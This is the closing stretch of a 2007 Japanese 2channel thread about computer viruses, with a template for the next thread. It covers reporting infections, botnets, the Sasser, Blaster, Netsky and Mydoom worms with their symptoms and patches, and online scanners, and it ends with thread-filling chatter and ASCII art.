怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
★ウィルス監視ソフトを常駐させよう。
→常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
→知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
→ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
→アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
→怪しいファイルにウィルスが混入しているケースもよくあることです。
怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
http://www.ipa.go.jp/security/outline/todokede-j.html
こちらに届け出の方法などが記載されています。
E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
966 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:19:18
ボットにご注意!!
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
ボットとは、コンピュータを悪用することを目的に作られた悪性プログラムで、コンピュータに感染すると、
インターネットを通じて悪意を持った攻撃者(以下「攻撃者」という)が、あなたのコンピュータを外部から遠隔操作します。
感染すると、この攻撃者があなたのコンピュータを操り「迷惑メールの大量配信」、「特定サイトの攻撃」等の迷惑行為をはじめ、
あなたのコンピュータ内の情報を盗み出す「スパイ活動」など深刻な被害をもたらします。
この操られる動作が、ロボット(Robot)に似ているところから、ボット(BOT)と呼ばれています。
ボットに感染したコンピュータは、攻撃者が用意した指令サーバなどに自動的に接続され、
数十〜数百万台のボット感染コンピュータを従えた「ボットネットワーク」と言われる巨大ネットワークを形成します。
感染したコンピュータは、攻撃者からの命令を待ち受け、攻撃者が下す命令によって、攻撃者の意のままに数十〜数百万台の感染コンピュータが操られた結果、
フィッシング目的などのスパムメールの大量送信や、特定サイトへのDDoS攻撃などに利用され、とても大きな脅威となります。
このため、感染コンピュータを使用しているユーザーは、知らぬ間に犯罪の踏み台にされ、「被害者」であると同時に「加害者」にもなってしまうのです
〜サイバークリーンセンター より引用〜
サイバークリーンセンター ボットとは
https://www.ccc.go.jp/bot/index.html
TREND MICRO ボット系ウイルス対策Web
http://www.trendmicro.com/jp/security/web/archive/overview/bot.htm
インターネット上の新たな脅威「ボット(bot)」に気をつけろ!(上)
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20041215/153889/?ST=security
967 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:20:03
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
968 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:20:43
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
969 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:21:17
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
* Mail Delivery System (<受取人メールアドレス>)
* Failure (<受取人メールアドレス>)
* Delivered Message (<受取人メールアドレス>)
* Deliver Mail (<受取人メールアドレス>)
* Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
例: date7386.pif 、 message19392.zip など
「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
* Error
* Status
* Server Report
* Mail Transaction Failed
* Mail Delivery System
* hello
* hi
[ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
"test"
"The message contains Unicode characters and has been sent as a binary attachment."
"The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
"Mail transaction failed. Partial message is available."
[ 任意の文字列 ] [ 空白 ]
・添付ファイル名: ランダムなアルファベット
970 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:29:27
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part10
http://pc10.2ch.net/test/read.cgi/sec/1169042051/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part12
http://pc10.2ch.net/test/read.cgi/sec/1162181635/
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8
Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp
Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/
Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part10
http://pc10.2ch.net/test/read.cgi/sec/1169042051/
Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
【総合】スパイウェア予防駆除 Part12
http://pc10.2ch.net/test/read.cgi/sec/1162181635/
971 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:30:37
感染の疑いがあり自分のアンチウイルスソフトで反応がない場合
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html
関連スレッド
オンラインによるウイルスチェックサービス
http://pc10.2ch.net/test/read.cgi/sec/1031073684/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
他社のオンラインスキャンをするとウイルスが検出されることがあります
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ
http://www.kaspersky.co.jp/scanforvirus/
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
Panda ActiveScan
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html
関連スレッド
オンラインによるウイルスチェックサービス
http://pc10.2ch.net/test/read.cgi/sec/1031073684/
※感染している場合ウイルスによっては外部と通信を行うものもありますので
パーソナルファイヤーウォール等でスキャンサイト以外の接続を遮断することをおすすめします
972 :次スレテンプレ ◆N9P3SuvBPo :2007/02/18(日) 15:36:59
関連スレッド
セキュリティ初心者質問スレッドpart82
http://pc10.2ch.net/test/read.cgi/sec/1171285882/
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/
☆☆トロイの木馬☆☆4台目
http://pc10.2ch.net/test/read.cgi/sec/1171000137/
sasser【スタコラサッサ】sasser Part2
http://pc10.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc10.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc10.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc10.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc10.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc10.2ch.net/test/read.cgi/sec/1091346741/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
セキュリティ初心者質問スレッドpart82
http://pc10.2ch.net/test/read.cgi/sec/1171285882/
Winnyを狙ったワーム・ニュイルス情報 Part60
http://tmp6.2ch.net/test/read.cgi/download/1170937127/
☆☆トロイの木馬☆☆4台目
http://pc10.2ch.net/test/read.cgi/sec/1171000137/
sasser【スタコラサッサ】sasser Part2
http://pc10.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc10.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc10.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc10.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc10.2ch.net/test/read.cgi/sec/1086494732/
【分析】HijackThis【研究】
http://pc10.2ch.net/test/read.cgi/sec/1091346741/
関連スレは次スレに移行してる場合もあります。
質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
973 : ◆N9P3SuvBPo :2007/02/18(日) 15:39:14
、 、_
ヽヽ \、_
,. -' ノノ ヽ \
_/ { / ‐-、 丶 ヽ、
/ _i´ ̄ ̄__ \、 l,. -―、
_/\ / // /  ̄、 \ ヽヽ_, ノ!
ヽ \ \ / |,.イ l丶 \ X ', ノi
!f´\\! l_|_|\ \--/,r=ミ| lヽ ノ
ヒ!_ \| l | N,≧ミ、トゝ ハ心}! K/ノ
_ノ tl | | l |{ ト心 `'" ! l_/
\_\ _ハi、ヾゝゞ'′ _'_,.ヘ / / ノ テンプレはここまで!
ヽ >/| lヽ\丶、__丶 _ノ/| /'´ /!
/,ヘ | |ミニ='⌒ (⌒ヽ´ _ !´ーヽ' `ヽ
〈_ { ヾ.,!/ , ´ \ ∨,.‐、ー‐、 l _ノ | ヽ| |_ 「 〉
!\ / __ム V⌒! / ! ヽ ⊥ 人_ _|_ |/
レ-〈 / f´ ヽ. '. __! // /- '´ O
__ ヽ! |r' \l__ V/ / /
! ー「 ! { `\_f_ノ∠ ノ
l ィ'´ ̄ヽ`ヽ.二ニァ'V∠二ハ_ \
〉/ ヽ---/´/レ!ト--'/‐"ノ
|/ !/ ´ ̄ヽ/´ヽ `ヽ、
_/ / V/ \ \
/\ ヽ/ 〃 /人 トrァ
<ハ \ ,!\ |l >'´/>
メ、\ \ / l ` |:! __ / / 〈
ヒ._ \ `ー---‐‐―ー‐!ヽ―'´ _ /イ `
´ア `K` iー---一'Tー-∨-r‐''´ |
ヽヽ \、_
,. -' ノノ ヽ \
_/ { / ‐-、 丶 ヽ、
/ _i´ ̄ ̄__ \、 l,. -―、
_/\ / // /  ̄、 \ ヽヽ_, ノ!
ヽ \ \ / |,.イ l丶 \ X ', ノi
!f´\\! l_|_|\ \--/,r=ミ| lヽ ノ
ヒ!_ \| l | N,≧ミ、トゝ ハ心}! K/ノ
_ノ tl | | l |{ ト心 `'" ! l_/
\_\ _ハi、ヾゝゞ'′ _'_,.ヘ / / ノ テンプレはここまで!
ヽ >/| lヽ\丶、__丶 _ノ/| /'´ /!
/,ヘ | |ミニ='⌒ (⌒ヽ´ _ !´ーヽ' `ヽ
〈_ { ヾ.,!/ , ´ \ ∨,.‐、ー‐、 l _ノ | ヽ| |_ 「 〉
!\ / __ム V⌒! / ! ヽ ⊥ 人_ _|_ |/
レ-〈 / f´ ヽ. '. __! // /- '´ O
__ ヽ! |r' \l__ V/ / /
! ー「 ! { `\_f_ノ∠ ノ
l ィ'´ ̄ヽ`ヽ.二ニァ'V∠二ハ_ \
〉/ ヽ---/´/レ!ト--'/‐"ノ
|/ !/ ´ ̄ヽ/´ヽ `ヽ、
_/ / V/ \ \
/\ ヽ/ 〃 /人 トrァ
<ハ \ ,!\ |l >'´/>
メ、\ \ / l ` |:! __ / / 〈
ヒ._ \ `ー---‐‐―ー‐!ヽ―'´ _ /イ `
´ア `K` iー---一'Tー-∨-r‐''´ |
974 :名無しさん@お腹いっぱい。:2007/02/18(日) 16:00:46
>>973もテンプレにいれるのん?
975 :名無しさん@お腹いっぱい。:2007/02/18(日) 16:14:18
入れなくていいだろ
976 :名無しさん@お腹いっぱい。:2007/02/18(日) 18:09:49
アボーソするAAを増やすのが宇材だけだが、
◆N9P3SuvBPoサソがどうしても、って言うなら我慢することにした。
◆N9P3SuvBPoサソがどうしても、って言うなら我慢することにした。
977 : ◆N9P3SuvBPo :2007/02/18(日) 19:02:59
いや別に>973は俺個人の好みでだから
978 :名無しさん@お腹いっぱい。:2007/02/18(日) 21:22:04
>>937
またNOD32等で検出できないウイルスが出ているね。
気を付けるにこしたことがない。
マイクロソフトの検出名:TrojanDownloader:Win32.Agent.FZ
http://vista.crap.jp/img/vi7180030368.jpg
http://www.virustotal.com/
またNOD32等で検出できないウイルスが出ているね。
気を付けるにこしたことがない。
マイクロソフトの検出名:TrojanDownloader:Win32.Agent.FZ
http://vista.crap.jp/img/vi7180030368.jpg
http://www.virustotal.com/
979 :名無しさん@お腹いっぱい。:2007/02/18(日) 21:45:04
980 :名無しさん@お腹いっぱい。:2007/02/18(日) 21:46:38
>>978
乙
乙
981 : ◆N9P3SuvBPo :2007/02/18(日) 23:33:29
では立てて来ます。
982 : ◆N9P3SuvBPo :2007/02/18(日) 23:37:56
983 :名無しさん@お腹いっぱい。:2007/02/18(日) 23:41:25
いってみる
984 :名無しさん@お腹いっぱい。:2007/02/18(日) 23:52:22
985 : ◆N9P3SuvBPo :2007/02/18(日) 23:53:11
>984さん、お疲れ様でした。
お茶でもどうぞつ旦
お茶でもどうぞつ旦
986 :名無しさん@お腹いっぱい。:2007/02/19(月) 00:05:04
>>984
鬱〜、いや・・・乙〜
鬱〜、いや・・・乙〜
987 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:42:33
産め
988 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:44:02
うむ
989 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:49:24
うめ
990 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:51:05
梅
991 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:52:18
━―━―━―━―━―━―━―━―━[JR山崎駅(^^)]━―━―━―━―━―━―━―━―━―
992 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:54:14
楳
993 : ◆N9P3SuvBPo :2007/02/19(月) 23:54:22
1000取って寝よ
994 :名無しさん@お腹いっぱい。:2007/02/19(月) 23:57:52
>>993
ガンガレ
ガンガレ
995 : ◆N9P3SuvBPo :2007/02/20(火) 00:05:15
うめ
996 : ◆N9P3SuvBPo :2007/02/20(火) 00:06:40
残り4レス
997 :名無しさん@お腹いっぱい。:2007/02/20(火) 00:07:14
>◆N9P3SuvBPo
ふぁいと〜
ふぁいと〜
998 : ◆N9P3SuvBPo :2007/02/20(火) 00:07:49
残り2
999 :名無しさん@お腹いっぱい。:2007/02/20(火) 00:10:49
} }
} / o ゚.
. 〉'' ,、,,,__ ノ} 。 :∴
i ムツッ=,ニ_゙゙"''‐- 、、,,,__,,..,,,.. -‐'''"/ 。 X,,
l {{ ハ` `゚'~` ,‐-,ニ二ヾ,,_ヽ / i'(_,.l\
〉、`ハ } ` `゚'゙゙” }}'゙ ,' ti=ti、iiヽ
. / ハヽハ ノ // { ゙ヾヽ}
/ /ハヽヘ `、_ (Cノ/ / ハ ノラ
/ // } Y゙\ ` Cノイ / \ 〆'
. / / / / ,ゞ,, `-‐ ''´〆⌒ヽ{ ,' ハ \
;''"''ヾノ /_,/ `'' ァ''7/ \l l ヽヾ \
ゞ..,,.'' ̄// ''´ // \ \ヾ \
1000 : ◆N9P3SuvBPo :2007/02/20(火) 00:10:52
1001 :1001:
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。
もう書けないので、新しいスレッドを立ててくださいです。。。